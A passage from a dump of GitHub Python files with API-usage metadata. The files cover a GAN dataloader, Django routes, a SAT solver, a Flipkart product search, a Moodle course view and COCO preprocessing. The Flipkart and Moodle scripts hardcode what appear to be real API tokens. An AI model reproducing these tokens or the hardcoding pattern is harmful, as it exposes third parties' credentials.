"os.path.abspath", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 19, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 20, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 20, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 42, "usage_type": "call"}, {"api_name": "os.path", "line_number": 42, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 43, "usage_type": "call"}, {"api_name": "os.path", "line_number": 43, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 45, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 46, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 47, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 66, "usage_type": "call"}, {"api_name": "message_filters.ApproximateTimeSynchronizer", "line_number": 72, "usage_type": "call"}, {"api_name": "rospy.spin", "line_number": 78, "usage_type": "call"}]}
+{"seq_id": "15175318169", "text": "import numpy as np\nimport pandas as pd\nfrom scipy.special import comb\n\nfrom LV_real_multispec_com import LV_pars, max_spec, LV_multi_spec\n\n# simple summary for number of communities\nn_specs = np.arange(2,7)\ncom_sum = pd.DataFrame()\n# distinct communities from papers\ndist_com = [sum(LV_multi_spec.n_spec == i) for i in range(max_spec+1)]\ncom_sum[\"dist_com\"] = dist_com\n# maximal number of communities\ncom_sum[\"max_com\"] = [int(sum(dist_com * comb(np.arange(0,max_spec +1),i)))\n for i in range(0,max_spec+1)]\n# communities for which all parameters exist and are nonzero\ncom_sum[\"full_com\"] = [len(mat) for mat in LV_pars[\"matrix\"]]\n# communities for which we can compute NFD parameters\n[sum(comp) for comp in LV_pars[\"NFD_comp\"]]\ncom_sum[\"NFD_comp\"] = [len(ND) for ND in LV_pars[\"ND\"]]\n# communities with stable equilibrium\ncom_sum[\"coex\"] = [sum(coex) for coex in LV_pars[\"real_coex\"]]\ncom_sum[\"no_coex\"] = com_sum[\"full_com\"]-com_sum[\"coex\"]\n\n\n\n# number of communities, for which invasion is not possible, or does not\n# predict coexistnece, but can coexist\ncoex_real = LV_pars[\"real_coex\"]\nNFD_comp = LV_pars[\"NFD_comp\"]\ncoex_invasion = LV_pars[\"coex_invasion\"]\n\n\ncoex_no_inv = [coex_real[i] & (~NFD_comp[i]) for i in n_specs]\ninv_wrong = [coex_real[i][NFD_comp[i]] != coex_invasion[i] for i in n_specs]\ncom_sum[\"no_inv\"] = 0\ncom_sum[\"no_inv\"].iloc[n_specs] = [sum(c) for c in coex_no_inv]\ncom_sum[\"inv_wrong\"] = 0\ncom_sum[\"inv_wrong\"].iloc[n_specs] = [sum(c) for c in inv_wrong]\ncom_sum[\"NFD_coex\"] = com_sum[\"coex\"]-com_sum[\"no_inv\"]\ncom_sum[\"NFD_no_coex\"] = com_sum[\"NFD_comp\"] -com_sum[\"NFD_coex\"]\ncom_sum = com_sum.T\n\ncom_sum[\"total\"] = np.sum(com_sum.values, axis = 1)\nprint(com_sum)\ncom_sum.index = [\"Original matrices\", \"Subcommunities\",\n \"Complete\\n int. matrix\", \"NFD computed\", \"coexistence\",\n \"comp. exclusion\", \"no invasion analysis\", \"invasion wrong\",\n \"NFD coexistence\", \"NFD comp. 
excl\"]\ndel(com_sum[0])\ndel(com_sum[1])\ncom_sum.to_csv(\"Table_S2.csv\", index = True) \n", "repo_name": "juergspaak/multi_species_NFD", "sub_path": "Table_S2.py", "file_name": "Table_S2.py", "file_ext": "py", "file_size_in_byte": 2040, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.arange", "line_number": 8, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 9, "usage_type": "call"}, {"api_name": "LV_real_multispec_com.LV_multi_spec.n_spec", "line_number": 11, "usage_type": "attribute"}, {"api_name": "LV_real_multispec_com.LV_multi_spec", "line_number": 11, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.max_spec", "line_number": 11, "usage_type": "name"}, {"api_name": "scipy.special.comb", "line_number": 14, "usage_type": "call"}, {"api_name": "numpy.arange", "line_number": 14, "usage_type": "call"}, {"api_name": "LV_real_multispec_com.max_spec", "line_number": 14, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.max_spec", "line_number": 15, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 17, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 19, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 20, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 22, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 29, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 30, "usage_type": "name"}, {"api_name": "LV_real_multispec_com.LV_pars", "line_number": 31, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 44, "usage_type": "call"}]}
+{"seq_id": "9220276953", "text": "import os\r\nimport random\r\nfrom PIL import Image\r\n\r\nfrom torch.utils import data\r\n\r\nimport torchvision\r\nimport torchvision.transforms as transforms\r\n\r\n\r\ndef create_dataloader(dataset='cifar10', batch_size=64, num_workers=1):\r\n if dataset == 'cifar10':\r\n transform = transforms.Compose([transforms.ToTensor(),\r\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))])\r\n\r\n trainset = torchvision.datasets.CIFAR10(root='./data/', train=True, transform=transform, download=True)\r\n testset = torchvision.datasets.CIFAR10(root='./data/', train=False, transform=transform, download=True)\r\n\r\n trainloader = data.DataLoader(dataset=trainset, batch_size=batch_size, shuffle=True, num_workers=num_workers)\r\n testloader = data.DataLoader(dataset=testset, batch_size=batch_size, shuffle=False, num_workers=num_workers)\r\n\r\n elif dataset == 'summer2winter':\r\n transform = transforms.Compose([transforms.ToTensor(),\r\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))])\r\n\r\n trainset = Summer2WinterDataset(train=True, transform=transform)\r\n testset = Summer2WinterDataset(train=False, transform=transform)\r\n\r\n trainloader = data.DataLoader(dataset=trainset, batch_size=batch_size, shuffle=True, num_workers=num_workers)\r\n testloader = data.DataLoader(dataset=testset, batch_size=1, shuffle=False, num_workers=num_workers)\r\n\r\n return trainloader, testloader\r\n\r\n\r\nclass Summer2WinterDataset(data.Dataset):\r\n def __init__(self, train: bool=True, transform=None):\r\n self.transform = transform\r\n dataset_dir = './data/summer2winter_yosemite/'\r\n\r\n # Implement the dataset for unpaired image-to-image translation.\r\n # Check the dataset directory and implement the proper dataset.\r\n # This dataset have to load the train or test files depending on the 'train' option.\r\n\r\n ### YOUR CODE HERE (~ 10 lines)\r\n self.train =train\r\n if self.train:\r\n self.image_list_A = os.listdir(dataset_dir+'trainA')\r\n self.folderA = dataset_dir +'trainA'\r\n self.image_list_B = os.listdir(dataset_dir + 'trainB')\r\n self.folderB = dataset_dir + 'trainB'\r\n else:\r\n self.image_list_A = os.listdir(dataset_dir + 'testA')\r\n self.folderA = dataset_dir + 'testA'\r\n self.image_list_B = os.listdir(dataset_dir + 'testB')\r\n self.folderB = dataset_dir + 'testB'\r\n\r\n self.image_list_A.sort()\r\n self.image_list_B.sort()\r\n self.transform = transforms.Compose([transforms.ToTensor(),\r\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))])\r\n ### END YOUR CODE\r\n\r\n def __getitem__(self, index):\r\n\r\n # The number of images in domain A and domain B are different.\r\n # You have to sample the index to load data from different pairs.\r\n\r\n ### YOUR CODE HERE (~ 2 lines)\r\n image_A= Image.open(os.path.join(self.folderA, self.image_list_A[index]))\r\n image_B = Image.open(os.path.join(self.folderB, self.image_list_B[random.randint(0,len(self.image_list_B)-1)]))\r\n\r\n ### END YOUR CODE\r\n\r\n return self.transform(image_A), self.transform(image_B)\r\n\r\n def __len__(self):\r\n return len(self.image_list_A)\r\n\r\n\r\nclass FolderDataset(data.Dataset):\r\n def __init__(self, folder):\r\n self.folder = folder\r\n self.image_list = os.listdir(folder)\r\n self.transform = transforms.Compose([transforms.ToTensor(),\r\n transforms.Normalize(mean=(0.5, 0.5, 0.5), std=(0.5, 0.5, 0.5))])\r\n\r\n def __getitem__(self, index):\r\n image = Image.open(os.path.join(self.folder, self.image_list[index]))\r\n return 
self.transform(image)\r\n\r\n def __len__(self):\r\n return len(self.image_list)\r\n", "repo_name": "thanhkaist/GAN", "sub_path": "dataloader.py", "file_name": "dataloader.py", "file_ext": "py", "file_size_in_byte": 3959, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "torchvision.transforms.Compose", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 13, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 13, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 14, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 14, "usage_type": "name"}, {"api_name": "torchvision.datasets.CIFAR10", "line_number": 16, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 16, "usage_type": "attribute"}, {"api_name": "torchvision.datasets.CIFAR10", "line_number": 17, "usage_type": "call"}, {"api_name": "torchvision.datasets", "line_number": 17, "usage_type": "attribute"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 19, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 19, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 20, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 20, "usage_type": "name"}, {"api_name": "torchvision.transforms.Compose", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 23, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 23, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 24, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 24, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 29, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 29, "usage_type": "name"}, {"api_name": "torch.utils.data.DataLoader", "line_number": 30, "usage_type": "call"}, {"api_name": "torch.utils.data", "line_number": 30, "usage_type": "name"}, {"api_name": "torch.utils.data.Dataset", "line_number": 35, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 35, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 47, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 49, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 52, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 54, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 59, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 59, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 59, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 60, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 60, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 69, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 69, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path", "line_number": 69, "usage_type": "attribute"}, {"api_name": "PIL.Image.open", "line_number": 70, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 70, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 70, "usage_type": 
"call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "random.randint", "line_number": 70, "usage_type": "call"}, {"api_name": "torch.utils.data.Dataset", "line_number": 80, "usage_type": "attribute"}, {"api_name": "torch.utils.data", "line_number": 80, "usage_type": "name"}, {"api_name": "os.listdir", "line_number": 83, "usage_type": "call"}, {"api_name": "torchvision.transforms.Compose", "line_number": 84, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 84, "usage_type": "name"}, {"api_name": "torchvision.transforms.ToTensor", "line_number": 84, "usage_type": "call"}, {"api_name": "torchvision.transforms.Normalize", "line_number": 85, "usage_type": "call"}, {"api_name": "torchvision.transforms", "line_number": 85, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 88, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 88, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}]}
+{"seq_id": "5091960940", "text": "import requests, json, pprint, time\nimport hashlib\nimport base64\n\nURL_SEARCH = \"https://affiliate-api.flipkart.net/affiliate/1.0/search.json\"\n\nheaders = { 'Fk-Affiliate-Id' : 'sujithejg',\n 'Fk-Affiliate-Token' : '1e3c864a20654c95ab56a300906e1d69',\n 'Content-Type' : 'application/json',\n }\n\ndef query(query_str):\n params = {\n 'query' : query_str,\n 'resultCount' : 5\n }\n response = requests.get(URL_SEARCH, headers=headers, params=params)\n res = response.json()\n print(res)\n product_id = res['products'][0]['productBaseInfoV1']\n print('\\n')\n print(product_id)\n print('\\n')\n #for k, v in product_id.items():\n print('\\n')\n print(product_id.get(\"productId\"))\n print('\\n')\n #return jsonData\n\nif __name__==\"__main__\":\n query('sony mobile');\n print(\"\\n\\n\\n\\n QUERYING IPOD \\n\\n\\n\\n\");\n query('ipod')\n", "repo_name": "snehadasa/Graphit_project", "sub_path": "query_api/query_flipkart_id.py", "file_name": "query_flipkart_id.py", "file_ext": "py", "file_size_in_byte": 915, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "requests.get", "line_number": 17, "usage_type": "call"}]}
+{"seq_id": "69921767449", "text": "# accounts/urls.py\n\nfrom django.urls import path, re_path\nfrom .views.users import active_users, current_user, Login, logout, Register, users, EditUser\nfrom .views.skins import available_skins, ActiveUserSkin, PurchasedUserSkins\nfrom .views.stats import Stats\nfrom .views.wallet import WalletAPI\n\nurlpatterns = [\n # Users\n path('users/current/', current_user),\n path('users/', users),\n path('users/active/', active_users),\n re_path(r'signup|register/$', Register.as_view(), name='account-create'),\n re_path(r'signin|login/$', Login.as_view(), name='account-login'),\n re_path(r'signout|logout/$', logout, name='account-logout'),\n path('users/edit/', EditUser.as_view()),\n # Skins\n path('skins/', available_skins),\n path('skins/active/', ActiveUserSkin.as_view()),\n path('skins/purchased/', PurchasedUserSkins.as_view()),\n # Stats\n re_path(r'stats|statistics/$', Stats.as_view()),\n # Wallet\n path('wallet/', WalletAPI.as_view())\n]\n", "repo_name": "cs188-software-design-security-w20/project-reiher-s-revenge", "sub_path": "backend/accounts/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 977, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "views.users.current_user", "line_number": 11, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "views.users.users", "line_number": 12, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "views.users.active_users", "line_number": 13, "usage_type": "argument"}, {"api_name": "django.urls.re_path", "line_number": 14, "usage_type": "call"}, {"api_name": "views.users.Register.as_view", "line_number": 14, "usage_type": "call"}, {"api_name": "views.users.Register", "line_number": 14, "usage_type": "name"}, {"api_name": "django.urls.re_path", "line_number": 15, "usage_type": "call"}, {"api_name": "views.users.Login.as_view", "line_number": 15, "usage_type": "call"}, {"api_name": "views.users.Login", "line_number": 15, "usage_type": "name"}, {"api_name": "django.urls.re_path", "line_number": 16, "usage_type": "call"}, {"api_name": "views.users.logout", "line_number": 16, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 17, "usage_type": "call"}, {"api_name": "views.users.EditUser.as_view", "line_number": 17, "usage_type": "call"}, {"api_name": "views.users.EditUser", "line_number": 17, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 19, "usage_type": "call"}, {"api_name": "views.skins.available_skins", "line_number": 19, "usage_type": "argument"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "views.skins.ActiveUserSkin.as_view", "line_number": 20, "usage_type": "call"}, {"api_name": "views.skins.ActiveUserSkin", "line_number": 20, "usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "views.skins.PurchasedUserSkins.as_view", "line_number": 21, "usage_type": "call"}, {"api_name": "views.skins.PurchasedUserSkins", "line_number": 21, "usage_type": "name"}, {"api_name": "django.urls.re_path", "line_number": 23, "usage_type": "call"}, {"api_name": "views.stats.Stats.as_view", "line_number": 23, "usage_type": "call"}, {"api_name": "views.stats.Stats", "line_number": 23, 
"usage_type": "name"}, {"api_name": "django.urls.path", "line_number": 25, "usage_type": "call"}, {"api_name": "views.wallet.WalletAPI.as_view", "line_number": 25, "usage_type": "call"}, {"api_name": "views.wallet.WalletAPI", "line_number": 25, "usage_type": "name"}]}
+{"seq_id": "18632807620", "text": "\nfrom sklearn import tree, metrics\n\nimport csv\n\n\ndef DT_2(alpha, delta)->int:\n\n #build And Train the tree\n\n class_weight_dict={'0':(1-delta) , '1':delta} #delta value is 0.8\n DT2 = tree.DecisionTreeClassifier(criterion=\"entropy\",min_samples_split=9 , class_weight=class_weight_dict)\n DT2.fit(train_data,train_results)\n\n\n #Test the tree\n #DT2_results = DT2.predict(test_data)\n DT2_prob_results=DT2.predict_proba(test_data)\n #Generate prediction tree\n\n\n delta_weighted_pred_result=[]\n for c_prob in DT2_prob_results:\n if alpha*c_prob[1]> c_prob[0]: # calculate classification by new rule alpha*|T|>|F|\n delta_weighted_pred_result.append('1')\n else:\n delta_weighted_pred_result.append('0')\n conf_mat1=metrics.confusion_matrix(test_results,delta_weighted_pred_result)\n\n conf_mat1[0][0],conf_mat1[1][1]=conf_mat1[1][1],conf_mat1[0][0]\n errw=conf_mat1[0][1]+4*conf_mat1[1][0]\n\n print(conf_mat1)\n\n return errw\n\n\n\n\n\n#Read Train file\n\n\ntrain_file = open('train.csv')\ndata = csv.reader(train_file, delimiter=',')\ntrain_data, train_results = [], []\nfor row in data:\n train_data.append(row[0:8])\n train_results.append(row[8])\ntrain_data, train_results=train_data[1:len(train_data)],train_results[1:len(train_results)]\n\n\n#Load test file\ntest_file = open('test.csv')\ndata = csv.reader(test_file, delimiter=',')\ntest_data,test_results = [], []\nfor row in data:\n test_data.append(row[0:8])\n test_results.append(row[8])\ntest_data, test_results=test_data[1:len(test_data)], test_results[1:len(test_results)]\n\n\ndelta=0.8\nalpha=4\nDT_2(alpha,delta)\n\n\n\n", "repo_name": "omertaub7/intro_ai_3", "sub_path": "DT2.py", "file_name": "DT2.py", "file_ext": "py", "file_size_in_byte": 1627, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 12, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 12, "usage_type": "name"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 28, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 28, "usage_type": "name"}, {"api_name": "csv.reader", "line_number": 45, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 55, "usage_type": "call"}]}
+{"seq_id": "31923104923", "text": "from django.shortcuts import render\nfrom django.http.request import HttpRequest\nfrom urllib.request import urlopen\nimport json\n\n\n# global token\n# global url\n# Create your views here.\n\n\ndef index(req:HttpRequest):\n \n \n if req.method == 'POST':\n\n \n \n '''\n main vars\n '''\n token = 'b7d481ee5afe361cc31f5ee05bb8968c'\n url = 'https://moodle-138098-0.cloudclusters.net/webservice/rest/server.php?'\n available_cources = []\n avilable_Category_for_cources = []\n categories = []\n\n \n \n \n '''\n not favrite\n\n is favorite\n '''\n \n \n '''\n Get courses\n '''\n urlcourse = f'{url}wstoken={token}&wsfunction=core_enrol_get_users_courses&userid=2&moodlewsrestformat=json'\n datacourse = urlopen(urlcourse).read()\n formattedcourses = json.loads(datacourse)\n for i in formattedcourses:\n available_cources.append(i)\n \n \n \n '''\n Get categories\n '''\n \n urlCate = f'{url}wstoken={token}&wsfunction=core_course_get_categories&moodlewsrestformat=json'\n dataCate = urlopen(urlCate).read()\n formattedCate = json.loads(dataCate)\n\n \n \n '''\n Match the ctegorie with the course\n '''\n print(formattedCate)\n for course in available_cources :\n categoryforcourse = course['category']\n for category in formattedCate:\n idcat = category['id']\n if idcat == categoryforcourse:\n categories.append(category['name'])\n \n avilable_Category_for_cources.append({\n 'name' : f\"{course['shortname']}\",\n 'categories' : categories,\n })\n print(avilable_Category_for_cources)\n var = {\n 'data' : avilable_Category_for_cources\n \n }\n return render (req, 'core/index.html', var)\n \n \n \n \n \n return render(req, 'core/index.html')", "repo_name": "omarhosnay/Testmoodle", "sub_path": "core/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2236, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "django.http.request.HttpRequest", "line_number": 12, "usage_type": "name"}, {"api_name": "urllib.request.urlopen", "line_number": 42, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 43, "usage_type": "call"}, {"api_name": "urllib.request.urlopen", "line_number": 54, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 55, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 79, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 85, "usage_type": "call"}]}
+{"seq_id": "45362874938", "text": "#!/usr/bin/env python3\n\nimport sys\nfrom collections import defaultdict\nimport os\nimport time\nimport argparse\n\ndef parse_dimacs(filename):\n clauses = []\n with open(filename, 'r') as input_file:\n for line in input_file:\n if line[0] in ['c', 'p']:\n continue\n literals = list(map(int, line.split()))\n assert literals[-1] == 0\n literals = literals[:-1]\n clauses.append(literals)\n return clauses\n\n# Jersolow-Wang method\ndef jersolow_wang_method(cnf):\n literal_weight = defaultdict(int)\n for clause in cnf:\n for literal in clause:\n literal_weight[literal] += 2 ** -len(clause)\n return max(literal_weight, key=literal_weight.get)\n\n# Jersolow-Wang 2-sided method (consider only positive literals)\n# this is faster by 50% relative improvement in speed\n# ref: http://www.cril.univ-artois.fr/~coste/Articles/coste-etal-sat05.pdf\ndef jersolow_wang_2_sided_method(cnf):\n literal_weight = defaultdict(int)\n for clause in cnf:\n for literal in clause:\n literal_weight[abs(literal)] += 2 ** -len(clause)\n return max(literal_weight, key=literal_weight.get)\n\n# Boolean Constrain Propagation\n# we set unit to true and so we need to update the cnf by the following rules:\n# - Clauses that contain unit are removed (due to \"or\")\n# - Update clauses by removing -unit from them if it exist (due to \"or\")\ndef bcp(cnf, unit):\n new_cnf = []\n for clause in cnf:\n if unit in clause:\n continue\n if -unit in clause:\n new_clause = [literal for literal in clause if literal != -unit]\n # base case: conjunct containing an empty disjunct so False\n # but we should continue later because there might be another path\n if not new_clause:\n return -1\n new_cnf.append(new_clause)\n else:\n new_cnf.append(clause)\n return new_cnf\n\n# This implements the while loop of the BCP function\ndef assign_unit(cnf):\n I = [] # contains the bool assignments for each variable\n unit_clauses = [clause for clause in cnf if len(clause) == 1]\n while unit_clauses:\n unit = unit_clauses[0][0]\n cnf = bcp(cnf, unit) # assign true to unit\n I += [unit]\n if cnf == -1:\n return -1, []\n # base case: empty conjunct so it is SAT\n if not cnf:\n return cnf, I\n unit_clauses = [clause for clause in cnf if len(clause) == 1] # update\n return cnf, I\n\n# DPLL algorithm is here\ndef backtrack(cnf, I):\n cnf, unit_I = assign_unit(cnf)\n I = I + unit_I\n if cnf == -1:\n return []\n if not cnf:\n \treturn I\n selected_literal = jersolow_wang_2_sided_method(cnf)\n res = backtrack(bcp(cnf, selected_literal), I + [selected_literal])\n # if no solution when assigning to True, try to assign to False\n if not res:\n res = backtrack(bcp(cnf, -selected_literal), I + [-selected_literal])\n return res\n\ndef run_benchmarks(fname):\n print('Running on benchmarks...')\n start_time = time.time()\n with open(fname, 'w') as out_file:\n for filename in os.listdir(\"benchmarks\"):\n clauses = parse_dimacs(os.path.join(\"benchmarks\", filename))\n assignment = backtrack(clauses, [])\n if assignment:\n out_file.write('SAT')\n else:\n out_file.write('UNSAT')\n out_file.write('\\n')\n end_time = time.time()\n print('Execution time: %.2f seconds' % (end_time - start_time))\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser()\n parser.add_argument('--run_benchmarks', action='store_true',\n help='Run the sat solver over all files in the benchmarks folder')\n parser.add_argument('--input_file', default=None,\n help='input file following DIMACS format (ignored if run_benchmarks is set to True')\n args = 
parser.parse_args()\n if args.run_benchmarks:\n run_benchmarks('benchmarks-results.log')\n elif args.input_file is not None:\n f = args.input_file\n assert os.path.exists(f), '{} does not exists'.format(f)\n clauses = parse_dimacs(f)\n assignment = backtrack(clauses, [])\n if assignment:\n print('SAT')\n assignment.sort(key=lambda x: abs(x))\n print(assignment)\n else:\n print('UNSAT')\n else:\n print('Please either choose an input file or run the benchmarks. Type --help for more details')\n", "repo_name": "mmz33/DPLL-SAT-Solver", "sub_path": "sat_dpll.py", "file_name": "sat_dpll.py", "file_ext": "py", "file_size_in_byte": 4142, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.defaultdict", "line_number": 23, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 33, "usage_type": "call"}, {"api_name": "time.time", "line_number": 92, "usage_type": "call"}, {"api_name": "os.listdir", "line_number": 94, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 95, "usage_type": "call"}, {"api_name": "os.path", "line_number": 95, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 102, "usage_type": "call"}, {"api_name": "argparse.ArgumentParser", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 116, "usage_type": "call"}, {"api_name": "os.path", "line_number": 116, "usage_type": "attribute"}]}
+{"seq_id": "40858927066", "text": "from PIL import Image\n\n# открываем картинку\nimg = Image.open(\"cat.jpg\")\npixels = img.load()\n\n# размеры\nprint(img.width, img.height)\n\nfor x in range(img.width//4):\n for y in range(img.height):\n r, g, b = pixels[x, y]\n\n a = (r+g+b)//3\n\n pixels[x, y] = (a, a, a)\n\nfor x in range(3*img.width//4, img.width):\n for y in range(img.height):\n r, g, b = pixels[x, y]\n\n a = (r+g+b)//3\n\n pixels[x, y] = (a, a, a)\n\nimg.show()\n", "repo_name": "roctbb/GoTo-Summer-17-3", "sub_path": "Day 2 - Pillow/grey.py", "file_name": "grey.py", "file_ext": "py", "file_size_in_byte": 485, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "PIL.Image.open", "line_number": 4, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 4, "usage_type": "name"}]}
+{"seq_id": "42400383149", "text": "'''\nTake the raw MSCOCO annotation files (like instances_train2014.json) and creates a csv where each lines is an example:\n12746,0,1,0,0,0,...1,0\n(12746 is the image id and the rest is the ground truth of each class)\n'''\nimport json\nimport os\nimport sys\n\nimport numpy as np\n\nfrom collections import defaultdict\nfrom pprint import pprint\n\n\ndef categories(json_data):\n cats = dict()\n for i, category in enumerate(sorted(json_data['categories'], key=lambda x: x['id'])):\n cats[category['id']] = {'name': category['name'], 'norm_id': i}\n\n assert len(cats) == 80\n return cats\n\n\ndef write_categories(root_dir, cats):\n '''\n normalized_id,name,original_id\n '''\n categories_file = os.path.join(root_dir, 'annotations', 'categories.csv')\n\n with open(categories_file, 'w+') as f_out:\n for key in sorted(cats, key=lambda x: cats[x]['norm_id']):\n line = '%s,%s,%s\\n' % (cats[key]['norm_id'], cats[key]['name'], key)\n f_out.write(line)\n\n\ndef write_dataset(root_dir, original_name, id_to_label):\n dataset_file = os.path.join(root_dir, 'annotations', 'multilabel_%s.csv' % original_name)\n with open(dataset_file, 'w+') as f_out:\n\n for img_id in sorted(id_to_label):\n ground_truth = [str(int(gt)) for gt in id_to_label[img_id]]\n line = str(img_id) + ',' + ','.join(ground_truth) + '\\n'\n f_out.write(line)\n\n\ndef create_csv(root_dir, original_name):\n\n annotations_file = os.path.join(root_dir, 'annotations', 'instances_%s.json' % original_name)\n with open(annotations_file, 'r') as f_in:\n json_data = json.load(f_in)\n\n # create categories file\n cats = categories(json_data)\n nb_classes = len(cats)\n\n # init image_ids\n id_to_label = dict()\n for img in json_data['images']:\n img_id = img['id']\n id_to_label[img_id] = np.zeros(nb_classes)\n\n # fill with data\n stats = defaultdict(int)\n for annot in json_data['annotations']:\n cat = annot['category_id']\n norm_cat = cats[cat]['norm_id']\n stats[cat] += 1\n\n img_id = annot['image_id']\n\n id_to_label[img_id][norm_cat] = 1\n pprint(stats)\n\n # write categories file\n write_categories(root_dir, cats)\n\n # write data csv file\n write_dataset(root_dir, original_name, id_to_label)\n\n\n# python3 pp_multilabel.py /share/DEEPLEARNING/datasets/mscoco train2017\nif __name__ == '__main__':\n create_csv(sys.argv[1], sys.argv[2])\n", "repo_name": "lcalem/partial-labels", "sub_path": "data/coco/preprocessing/pp_multilabel.py", "file_name": "pp_multilabel.py", "file_ext": "py", "file_size_in_byte": 2454, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 7, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": 